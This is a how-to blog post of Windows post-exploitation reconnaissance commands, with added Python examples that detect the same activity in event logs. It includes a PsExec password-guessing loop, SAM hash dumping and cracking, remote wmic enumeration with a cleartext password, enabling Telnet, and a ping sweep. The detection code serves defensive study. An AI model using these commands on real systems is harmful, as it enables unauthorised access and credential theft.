Sep 25, 2011

Howto: Commands for Information Gathering in Windows Post-Exploitation

If you want to see every command together with its output, please go to the Source.

Gathering system-related information

Running Services

C:\>tasklist /svc 

Installed Services

C:\>sc query state= all

Current environment settings

Find Username

C:\>set | find "USERNAME"

Find Domain

C:\>set | find "USERDOMAIN"

Find Current User Information

C:\>net user John 

Find Users with Administrator Privileges in the current machine

C:\>net localgroup Administrators 

Password Guessing with PsExec

Username: Jack, Computer Name: XP-INTRANET, Password List: PassList.txt

C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************
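
Each wrong guess in the loop above produces one failed logon on the target, so on the defender's side this technique looks like a burst of Security event 4625 for one account from one source, sometimes followed by a 4624 when a guess works. The following Python is an added example that is not part of the original post: it runs that check over a few constructed 4625/4624 records (the field names, addresses and timestamps are assumptions made for the example, not a real export).

```python
"""Spot password-guessing bursts in Windows Security events (added example).

The records below are constructed for this example; they mimic the fields a SIEM
usually exports from event 4625 (failed logon) and 4624 (successful logon):
TargetUserName, the source address, and the event time.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # six failures for one account from one source inside a few seconds...
    {"time": "2011-09-25T10:00:01", "id": 4625, "user": "Jack", "src": "192.168.168.50"},
    {"time": "2011-09-25T10:00:02", "id": 4625, "user": "Jack", "src": "192.168.168.50"},
    {"time": "2011-09-25T10:00:03", "id": 4625, "user": "Jack", "src": "192.168.168.50"},
    {"time": "2011-09-25T10:00:04", "id": 4625, "user": "Jack", "src": "192.168.168.50"},
    {"time": "2011-09-25T10:00:05", "id": 4625, "user": "Jack", "src": "192.168.168.50"},
    {"time": "2011-09-25T10:00:06", "id": 4625, "user": "Jack", "src": "192.168.168.50"},
    # ...then a success: one of the guesses worked
    {"time": "2011-09-25T10:00:07", "id": 4624, "user": "Jack", "src": "192.168.168.50"},
    # a single mistyped password elsewhere, which must not alert
    {"time": "2011-09-25T10:05:00", "id": 4625, "user": "alice", "src": "192.168.168.77"},
]


def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def detect_spray(events, threshold=5, window=timedelta(seconds=60)):
    """Return {(user, src): details} for every account/source pair that
    accumulated at least `threshold` failed logons inside one sliding window.
    `success_after` records whether a 4624 for the same pair followed the burst."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ev in events:
        key = (ev["user"], ev["src"])
        when = parse_time(ev["time"])
        if ev["id"] == 4625:
            failures[key].append(when)
        elif ev["id"] == 4624:
            successes[key].append(when)

    alerts = {}
    for key, times in failures.items():
        times.sort()
        start = 0
        best = 0
        burst_end = None
        # two-pointer sliding window: keep only failures within `window` of the current one
        for end, when in enumerate(times):
            while when - times[start] > window:
                start += 1
            count = end - start + 1
            if count > best:
                best, burst_end = count, when
        if best >= threshold:
            alerts[key] = {
                "failures_in_window": best,
                "burst_end": burst_end.isoformat(),
                "success_after": any(s >= burst_end for s in successes.get(key, [])),
            }
    return alerts


if __name__ == "__main__":
    for (user, src), info in detect_spray(SAMPLE_EVENTS).items():
        print(f"{user} from {src}: {info}")
```

The threshold and window are tuning knobs: a guessing loop like the one above runs far faster than a human mistyping a password, so a short window with a low count catches it without flagging ordinary lockout noise.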

Extract Hashes from the sam and system file with samdump2

root@bt:~# samdump2 sam system >hashes.txt

Password cracking with John the Ripper using a wordlist

root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt

Gather DNS Information

C:\>ipconfig /displaydns

OS Information

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion 

Installed Software

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version

Running Processes

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ process list brief

Local Drives Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get 

Shares Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table

Network Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get 

List Service Information

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

Find a specific Service State

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET 

Change start mode of service to automatically start upon boot

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL 

Starting the Telnet service

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL
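
Every command in this post, the local ones at the top as well as the remote wmic calls, is recorded as a process creation on the machine it runs on, and with command-line auditing enabled the wmic lines above also land the /password: value in cleartext in that log. The following Python is an added example, not from the original post: it groups constructed process-creation records (event 4688 style; the host names, times, record layout and the password value are assumptions) by host, scores how many distinct enumeration categories from this post appear within a ten-minute window, and redacts any credential passed on the command line before the record would be forwarded.

```python
"""Flag enumeration bursts and cleartext credentials in process-creation telemetry
(added example; the records are constructed, not from a real host)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One rule per enumeration category used in this post. Patterns run over the
# full command line of a process-creation record (event 4688 style).
RECON_RULES = [
    ("service_enum", re.compile(r"\b(tasklist(\.exe)?\s+/svc|sc(\.exe)?\s+query\s+state=\s*all)", re.I)),
    ("env_enum", re.compile(r'\bset\b.*\|\s*find(str)?(\.exe)?\s+"?USER(NAME|DOMAIN)', re.I)),
    ("account_enum", re.compile(r"\bnet1?(\.exe)?\s+(user|localgroup\s+administrators)\b", re.I)),
    ("dns_cache", re.compile(r"\bipconfig(\.exe)?\s+/displaydns", re.I)),
    ("wmic_inventory", re.compile(r"\bwmic(\.exe)?\b.*\b(os|product|process|logicaldisk|share|nicconfig|service)\b", re.I)),
]
# wmic accepts the password on the command line; auditing then writes it to the log.
CRED_PATTERN = re.compile(r"(/password:)\S+", re.I)

# Constructed records: host names, times and the password value are made up.
SAMPLE_EVENTS = [
    {"host": "WS01", "time": "2011-09-25T11:00:00", "cmdline": "tasklist /svc"},
    {"host": "WS01", "time": "2011-09-25T11:00:05", "cmdline": "sc query state= all"},
    {"host": "WS01", "time": "2011-09-25T11:01:10", "cmdline": 'set | find "USERNAME"'},
    {"host": "WS01", "time": "2011-09-25T11:02:00", "cmdline": "net localgroup Administrators"},
    {"host": "WS01", "time": "2011-09-25T11:04:30",
     "cmdline": "wmic /node:SRV01 /user:svc_admin /password:Example-Pass-123 os get name"},
    {"host": "WS02", "time": "2011-09-25T11:00:00", "cmdline": "notepad.exe C:\\notes.txt"},
    {"host": "WS02", "time": "2011-09-25T11:30:00", "cmdline": "ipconfig /displaydns"},
]


def redact(cmdline):
    """Replace a cleartext /password: value so the record is safe to forward."""
    return CRED_PATTERN.sub(r"\g<1><REDACTED>", cmdline)


def analyse(events, window=timedelta(minutes=10), min_categories=3):
    """Per host: the largest set of distinct enumeration categories seen inside
    one sliding window, an alert flag, and every command line that exposed a
    credential (already redacted)."""
    by_host = defaultdict(list)
    for ev in events:
        when = datetime.strptime(ev["time"], "%Y-%m-%dT%H:%M:%S")
        by_host[ev["host"]].append((when, ev["cmdline"]))

    findings = {}
    for host, rows in by_host.items():
        rows.sort()
        tagged = []    # (time, category) for every rule that matched
        exposed = []
        for when, cmd in rows:
            if CRED_PATTERN.search(cmd):
                exposed.append(redact(cmd))
            for name, pattern in RECON_RULES:
                if pattern.search(cmd):
                    tagged.append((when, name))
        # sliding window over the tagged events, counting distinct categories
        best = set()
        start = 0
        for end in range(len(tagged)):
            while tagged[end][0] - tagged[start][0] > window:
                start += 1
            in_window = {name for _, name in tagged[start:end + 1]}
            if len(in_window) > len(best):
                best = in_window
        findings[host] = {
            "recon_categories": sorted(best),
            "alert": len(best) >= min_categories,
            "exposed_credentials": exposed,
        }
    return findings


if __name__ == "__main__":
    for host, result in analyse(SAMPLE_EVENTS).items():
        print(host, result)
```

Scoring on distinct categories rather than raw command counts keeps a single admin running tasklist from alerting, while the combination of service, environment, account and remote WMI enumeration inside a few minutes is exactly the sequence this post walks through. The redaction step matters independently of detection: a SIEM that stores raw 4688 command lines otherwise becomes a second copy of every password typed into wmic.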

Ping Sweep

C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "Reply"
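
A FOR /L sweep like the one above sends one echo request to every address in the /24 within a few seconds, which stands out in any ICMP or firewall log as a single source touching many destinations. The Python below is an added example (not from the original post) that finds such a source in constructed log lines; the line format, the addresses and the threshold are assumptions made for the example.

```python
"""Detect a ping sweep in ICMP log lines (added example on constructed data)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log layout: "<date> <time> ICMP <src> -> <dst> type=<icmp type>".
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) ICMP "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}) -> (?P<dst>\d{1,3}(?:\.\d{1,3}){3}) type=(?P<type>\d+)$"
)

# Constructed sample: one host walks .1 through .12 in twelve seconds, another
# host checks its gateway once and gets a reply, and one line is malformed.
SAMPLE_LOG = [
    f"2011-09-25 10:00:{i:02d} ICMP 192.168.168.10 -> 192.168.168.{i} type=8" for i in range(1, 13)
] + [
    "2011-09-25 10:00:30 ICMP 192.168.168.20 -> 192.168.168.1 type=8",
    "2011-09-25 10:00:31 ICMP 192.168.168.1 -> 192.168.168.20 type=0",
    "2011-09-25 10:00:32 malformed line that the parser must skip",
]


def parse(lines):
    """Yield (timestamp, src, dst, icmp_type) for every well-formed line."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        yield (datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
               m.group("src"), m.group("dst"), int(m.group("type")))


def detect_ping_sweep(lines, min_targets=10, window=timedelta(seconds=60)):
    """Return {src: distinct_target_count} for sources that sent echo requests
    (ICMP type 8) to at least `min_targets` distinct hosts inside one window."""
    requests = defaultdict(list)
    for ts, src, dst, icmp_type in parse(lines):
        if icmp_type == 8:          # echo request only; replies are not probes
            requests[src].append((ts, dst))

    hits = {}
    for src, rows in requests.items():
        rows.sort()
        start = 0
        best = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1
            distinct = len({dst for _, dst in rows[start:end + 1]})
            best = max(best, distinct)
        if best >= min_targets:
            hits[src] = best
    return hits


if __name__ == "__main__":
    print(detect_ping_sweep(SAMPLE_LOG))
```

Counting distinct destinations rather than packets is what separates a sweep from a monitoring host that pings the same gateway every few seconds.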
